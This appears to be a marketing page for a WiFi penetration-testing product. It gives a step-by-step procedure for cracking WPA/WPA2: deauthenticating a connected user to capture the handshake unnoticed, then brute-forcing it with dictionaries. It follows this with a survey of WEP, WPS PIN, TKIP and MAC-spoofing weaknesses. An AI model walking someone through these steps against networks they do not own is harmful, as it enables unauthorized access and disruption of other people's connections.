Wi-Fi WPA - WPA2 & WPS Encryption Cracking Guide
How do attackers break in to the WiFi access points.
Some of the newer vulnerabilities in WPS WiFi Protected Setup shows that many routers are fundamental vulnerable.
The WPS Allows attackers to brute force
The WPS functionality that is enabled from the factory in most routers from TP-Link, Dlink, Zyxel, Huawei, Linksys and others.
Due to the poor design there is no limiting connection attempts.
The vulnerability allows hackers to guess the code no matter the length in just about 20.000 attempts.
Where before the vulnerability it would have taken 100.000.000 attempts.
This means it is possible in just a couple of hours by the hackers
1. First of all, you must start the wi-fi scan and connect an 8 dBi antenna for the best range possible.
- Once it starts Wi-Fi Auditing networks, you will see several WEP WPA & WPA2 networks on the target listing. It is a must for you to look see the WiFi signal power of the access point that you want to target.
- It is adviced for you to have at minimum 15 in signal strength power or higher to successfully sniff the handshake and crack your targeted WPA or WPA2 network.
- Cracking a WPA or WPA2 network is different from cracking WEP—which means it will not just crack in a matter of minutes.
- Instead, you need to capture a connection handshake from a valid user that connects to the WPA or WPA2 network and then Brute force his connection with authority.
- The Portable Penetrator will assist you with this by providing 300% enforced speed and overly large dictionaries in many languages.
- There are two ways to get the handshake if there are users connected.
- The handshake gets captured whenever someone connects to the wi-fi network.
- If no users are connected you must be patient and wait for someone to connect and capture the WPA or WPA2 handshake that can be cracked.
- Otherwise, you won't be able to crack the encryption.
- If there is one or several users connected to the WPA or WPA2, simply select the network and target one of the users.
- From there, create a quick DOS attack at one of the connected users to force that user to disconnect and reconnect.
- Through this method, you'll capture the handshake.
- Usually, the user will not even notice anything when you do the attack.
- When you have the handshake, the cracking will begin with the selected dictionaries.
- A good crack will run with 1,300 keys a second, which is equivalent to millions of cracks within a few hours.
- If the password was not found in the dictionary you selected, you can select another dictionary File.
- It is highly recommended to select your language files dictionary or choosing a hefty 1 gigabyte dictionary files for better cracking availability performance.
For support please contact your support team that can help with more instructions for the password recovery.
With Portable Penetrator WiFi Pen Testing Software you can do an audit scan on your WiFi encrypted networks for WPA/WPA2, WPS, WEP weakness.
Learn to secure your WiFi before it gets hacked by wardriving black hat hackers.
WiFi Security Utopia - WPA2 WPA WEP Keys
WiFi Networks WLAN are now in many locations more common than the old fashioned cable connected Internet. Installation of cables in a building or office locations can many times be an expensive and a slow task. It might even require authorized technicians to install the cables across walls and to get the installations certified afterwards.
Another issue is if the cables are not long enough
Or there must be drilled holes in wall for new cables when a new room requires cables. This then requires installation certification, time and cost.
A cable can also simple break if someone have it connected to a laptop and another person walks and fall over the cable.
This could cause damage on the laptop and have the connection plug break, which would needs to be replaced.
Another issue is if a cable is bend to hard, the cables inside can break and would require to be repaired.
Another limitation is if a user has a laptop and wants to walk from room to room or a different place in the room, the user can only walk to locations with a cable plug and limiting the freedom of the user.
A simple solution to resolve the cable challenges could be wireless technology. Wireless Networks have been around for many years but has just started to catch on in the last few years. After most laptop vendors started to deliver ,their laptops with build in WiFi capabilities where at earlier times it was a hassle for the user to use an external PCMCIA card or USB adapters.
Today an ever-increasing need for Smart Phones and Sub Notebooks that only comes installed with WiFi capability puts and even more need for WiFi Networks.
The flexibility is that a User can easily connect to the network through walls or even floors without the need of any cables.
The user can even walk from departments in the organization and still be connected. Even the User can be abroad or at a coffee shop and still be connected.
We could now all take a rest, while connectivity freedom via WiFi utopia has been reached!
With most new technologies that are introduced, to solve a certain problem will also introduce new areas of concern or risk.
There are many concerns, risks, and security problems about WiFi technology. One could even argue that the technology have been introduced too fast without the scrutiny of the security point of view.
Key risk areas that have arisen while using wireless networks
• WiFi Disturbance.
There have been cases with 2.4 GHz and 5.8 GHz networks that can easily be disturbed.
And being blocked from functioning.
Even common cordless phones are known to interfere and the same with microwave Owens.
A remote attacker can even buy a WiFi Jammer online and easily block entire WiFi networks. So if an organization solely rely on WiFi technology it can be very vulnerable to DoS Denial of Service attack.
• The encryptions used for Wi-Fi networks have been broken over and again.
The first Encryption introduced WEP Wired Equivalent Privacy was already broken in 2001, and there has been found numerous flaws in this encryption technology.
• MAC address protection.
The Wi-Fi Router Manufactures introduced MAC address protection by only allowing white listed MAC addresses of computers to connect. However attacks can easily in seconds spoof a MAC address and connect anyway
• The problem about sniffing of traffic can be caused when there are multiple users connected to an Access Point and the users might get the felling it is secure but in reality other people on the same access point can sniff passwords for websites, mail services if they are running without HTTPS.
There have even been plugins for Firefox and other browsers that allowed to take over other peoples Facebook
• The more secure WPA/WPA2 was introduced to combat WEP security risks as being a replacement in 2003.
On a WPA/WPA2 encrypted network an attacker can still cause DoS attacks against users by sending De authentication packets forcing the users to reconnect and this way sniff the connection handshake. Once the attacker has access to the connection handshake it can be subject to brute force in a distributed a fast way.
This can lead to a compromise of a thought secure network.
• WPA TKIP Temporal Key Integrity Protocol injection vulnerability.
It is possible to decrypt short packets.
This do not lead to recovery of the key password but recovery of the keystream used to encrypt a packet.
This can allow an attacker to inject faked ARP packets making the victim sending outgoing packets to the Internet.
• WPS Pin Key Recovery. This is very serious vulnerability introduced in December 2011.
If a target Access Point has enabled Wi-Fi Protected Setup (WPS) feature it can be subject to attack. It does not even matter which encryption is used or strength of the password.
Many Access Points comes from the manufacturer with the function enabled by default out of the package.
It can allow an attacker to recover the WPS PIN sometimes in a few hours or few days and by that also get the routers WPA/WPA2 password.
• MS-CHAPv2 vulnerability. in 2012 a weakness was discovered in MS-CHAPv2 that allows brute-force attacks that can be done with modern hardware.